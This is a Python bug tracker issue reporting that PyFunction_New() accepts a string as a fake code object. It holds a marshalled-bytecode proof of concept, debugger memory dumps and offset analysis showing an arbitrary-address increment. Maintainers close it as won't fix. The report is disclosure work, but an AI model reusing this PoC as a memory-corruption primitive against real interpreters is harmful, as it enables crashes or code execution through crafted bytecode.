Issue 29825: PyFunction_New() not validate code object
Created on 2017-03-16 08:47 by LCatro, last changed 2022-04-11 14:58 by admin. This issue is now closed.
Messages (4)
Author: (LCatro)
Date: 2017-03-16 08:47
PyFunction_New() does not validate the code object, so we can pass a string object as a fake code object.
This is the Python bytecode:
LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41'
MAKE_FUNCTION 0
In the source code, we can see that the string object ends up in the variable v:
TARGET(MAKE_FUNCTION) {
    v = POP(); /* code object */             <= now it is a string object
    x = PyFunction_New(v, f->f_globals);     <= used here
Then the string object we made is passed into PyFunction_New():
PyFunction_New(PyObject *code, PyObject *globals) {
    PyFunctionObject *op = PyObject_GC_New(PyFunctionObject, &PyFunction_Type);
    static PyObject *name = 0;
    if (op != NULL) {     <= this only checks the newly allocated object pointer, not the Python type of the code argument (which should be TYPE_CODE)
        PyObject *doc;
        PyObject *consts;
        PyObject *module;
        op->func_weakreflist = NULL;
        Py_INCREF(code);
        op->func_code = code;
        Py_INCREF(globals);
        op->func_globals = globals;
        op->func_name = ((PyCodeObject *)code)->co_name;
        Py_INCREF(op->func_name);     <= this increments the value at an arbitrary address by one
The MAKE_CLOSURE opcode is similar:
TARGET(MAKE_CLOSURE) {
    v = POP(); /* code object */
    x = PyFunction_New(v, f->f_globals);
The PoC and crash details are in the uploaded file.
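For contrast, here is a minimal sketch of how the Python-level function constructor treats the same kind of fake code object. It assumes that types.FunctionType type-checks its code argument (which is the behavior I am aware of in CPython); the helper name try_make_function is hypothetical and only used for illustration. It does not exercise the MAKE_FUNCTION path described in the report.

```python
import types


def try_make_function(code_like):
    """Try to build a function from code_like via the Python-level constructor.

    Hypothetical helper: returns a short status string instead of raising.
    """
    try:
        types.FunctionType(code_like, {})
    except TypeError as exc:
        # The constructor refuses anything that is not a real code object.
        return "rejected: %s" % exc
    return "accepted"


# A string shaped like the one in the report, and a genuine code object.
fake_code = "C" * 32 + "AAAA"
real_code = compile("pass", "<example>", "exec")

print(try_make_function(fake_code))
print(try_make_function(real_code))
```

The point of the comparison is only that the type check lives in the constructor's argument parsing, not in PyFunction_New() itself, which is what the bytecode path calls directly.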
Author: Jelle Zijlstra (JelleZijlstra) *
Date: 2017-03-17 07:00
I don't think this is a bug; it is known and expected that you can do all kinds of bad things by writing bytecode manually. (You can already make Python write to random memory by giving it LOAD_FAST or STORE_FAST opcodes with incorrect offsets.)
This doesn't seem to be clearly documented though; the documentation just says that bytecode can change between releases.
Author: (LCatro)
Date: 2017-03-17 08:56
Actually, LOAD_CONST is given a correct offset. I wrote a Python opcode compiler, and LOAD_CONST 'CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x41\x41\x41\x41' is converted to LOAD_CONST 1. Looking back at the PoC, it means:
LOAD_CONST 1       => load a string object from co->consts onto the Python stack
MAKE_FUNCTION 0    => first, the Python core pops an object from the Python stack, and then uses this object to create a function
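As a point of comparison, the sketch below shows what the regular compiler emits for a def statement: the constant it loads before MAKE_FUNCTION is a genuine code object. This assumes a Python 3 interpreter where dis.get_instructions is available and where the opcode is still named MAKE_FUNCTION; the helper name describe_make_function is hypothetical.

```python
import dis
import types


def describe_make_function(source):
    """Compile source and report the opcode names and the code-object constants.

    Hypothetical helper for illustration; it never executes the compiled code.
    """
    module_code = compile(source, "<example>", "exec")
    opnames = [ins.opname for ins in dis.get_instructions(module_code)]
    code_consts = [c for c in module_code.co_consts
                   if isinstance(c, types.CodeType)]
    return opnames, code_consts


opnames, code_consts = describe_make_function("def f():\n    pass\n")
print(opnames)
print([c.co_name for c in code_consts])
```

Hand-written bytecode like the PoC skips this compiler guarantee, which is why the interpreter ends up with a string where it expects a code object.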
So set a breakpoint at TARGET(MAKE_FUNCTION):
v = POP(); /* code object */     <= now it is a string object
x = PyFunction_New(v, f->f_globals);
PyFunction_New(PyObject *code, PyObject *globals)     <= now the code argument is a string object, not a code object
op->func_name = ((PyCodeObject *)code)->co_name;     <= look here
Py_INCREF(op->func_name);
This converts to the following assembly:
1e07e24e 8b4834    mov ecx,dword ptr [eax+34h]
...
1e07e254 ff01      inc dword ptr [ecx]
This means that if we control the data at offset 0x34 of the structure, we can make an arbitrary address get incremented.
A Python string object's struct looks like this: |Python_Type|String_Length|String_Data|
Set a breakpoint at 0x1e07e24e and look at eax:
0:000> dd eax
0204d2e0  00000003 1e1d81f8 00000024 c7554b90
0204d2f0  00000001 43434343 43434343 43434343
0204d300  43434343 43434343 43434343 43434343
0204d310  43434343 41414141 68746100 00275f5f
0204d320  0204e408 0204d3e0 fffffffd ffffffff
0204d330  00000001 1e1dbb00 01fda968 01fe28a0
0204d340  0204b590 00000000 1e1d9824 01fb1760
0204d350  00000000 00000000 01feb2c0 01ff9930
So the dword at [eax+34h] is 0x41414141, and inc dword ptr [ecx] becomes inc dword ptr [0x41414141].
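The offset arithmetic can be checked with a small sketch that rebuilds the first four rows of the dump as little-endian bytes. The 0x14-byte header size is an assumption based on reading the dump as a 32-bit Python 2 string object (reference count, type pointer, length, hash, state, then the data); the names HEADER_SIZE and read_dword are hypothetical.

```python
import struct

# First four rows of the "dd eax" dump, as 32-bit little-endian dwords.
BASE = 0x0204D2E0
DWORDS = [
    0x00000003, 0x1E1D81F8, 0x00000024, 0xC7554B90,
    0x00000001, 0x43434343, 0x43434343, 0x43434343,
    0x43434343, 0x43434343, 0x43434343, 0x43434343,
    0x43434343, 0x41414141, 0x68746100, 0x00275F5F,
]
MEMORY = struct.pack("<%dI" % len(DWORDS), *DWORDS)

# Assumption: five 4-byte header fields precede the string data.
HEADER_SIZE = 0x14
CO_NAME_OFFSET = 0x34  # offset used by "mov ecx,dword ptr [eax+34h]"


def read_dword(offset):
    """Read the dword at BASE + offset from the reconstructed dump."""
    return struct.unpack_from("<I", MEMORY, offset)[0]


string_length = read_dword(0x08)
string_data = MEMORY[HEADER_SIZE:HEADER_SIZE + string_length]
index_in_string = CO_NAME_OFFSET - HEADER_SIZE

print(hex(BASE + CO_NAME_OFFSET), hex(read_dword(CO_NAME_OFFSET)))
print(index_in_string, string_data[index_in_string:index_in_string + 4])
```

Under that reading, offset 0x34 falls 32 bytes into the string data, which is exactly where the four \x41 bytes follow the 32 'C' characters.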
I triggered this by compiling the opcodes into a .pyc file, but it can also be triggered from a .py file. This is the PoC:
import marshal
code=b'\x63\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x73\x0A\x00\x00\x00\x64\x01\x00\x84\x00\x00\x64\x00\x00\x53\x28\x02\x00\x00\x00\x4E\x73\x24\x00\x00\x00\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x41\x41\x41\x41\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x28\x00\x00\x00\x00\x74\x00\x00\x00\x00\x73\x08\x00\x00\x00\x3C\x6D\x6F\x64\x75\x6C\x65\x3E\x01\x00\x00\x00\x74\x02\x00\x00\x00\x00\x01'
poc=marshal.loads(code)
exec(poc)
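To see what the marshalled payload contains without loading or executing it, the sketch below decodes only the 10 bytes that follow the \x73\x0A\x00\x00\x00 string header in the PoC, which appear to be the bytecode. It assumes the Python 2.7 encoding (one opcode byte, plus a 2-byte little-endian argument for opcodes >= 90) and uses a deliberately tiny opcode table; disassemble_py27 is a hypothetical helper, not part of any library.

```python
# Assumption: Python 2.7 opcode numbers for the three opcodes used here.
PY27_OPNAMES = {100: "LOAD_CONST", 132: "MAKE_FUNCTION", 83: "RETURN_VALUE"}
HAVE_ARGUMENT = 90  # opcodes at or above this value carry a 2-byte argument

# The 10 bytecode bytes copied from the PoC's marshalled data.
CO_CODE = b"\x64\x01\x00\x84\x00\x00\x64\x00\x00\x53"


def disassemble_py27(code_bytes):
    """Decode Python 2.7 style bytecode into (opname, argument) pairs."""
    data = bytearray(code_bytes)
    result = []
    i = 0
    while i < len(data):
        op = data[i]
        name = PY27_OPNAMES.get(op, "OP_%d" % op)
        if op >= HAVE_ARGUMENT:
            # Argument is stored as a little-endian 16-bit value.
            arg = data[i + 1] | (data[i + 2] << 8)
            result.append((name, arg))
            i += 3
        else:
            result.append((name, None))
            i += 1
    return result


for name, arg in disassemble_py27(CO_CODE):
    print(name if arg is None else "%s %d" % (name, arg))
```

This matches the sequence described earlier in the message: LOAD_CONST 1 followed by MAKE_FUNCTION 0, then the usual LOAD_CONST 0 and RETURN_VALUE at the end of a module.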
Author: Serhiy Storchaka (serhiy.storchaka) *
Date: 2017-03-17 09:16
This is a deliberate decision. In general, it is very difficult to verify the bytecode for correctness (whatever correctness criterion has been chosen). Any check takes time and this will slow down the execution in the normal case. This is not considered a security issue since passing untrusted bytecode is not safe in any case.
History
Date                 User              Action  Args
2022-04-11 14:58:44  admin             set     github: 74011
2017-03-17 09:16:32  serhiy.storchaka  set     status: open -> closed; nosy: + serhiy.storchaka; messages: +; resolution: wont fix; stage: resolved
2017-03-17 08:56:17  LCatro            set     messages: +
2017-03-17 07:00:29  JelleZijlstra     set     nosy: + JelleZijlstra; messages: +
2017-03-16 08:47:57  LCatro            create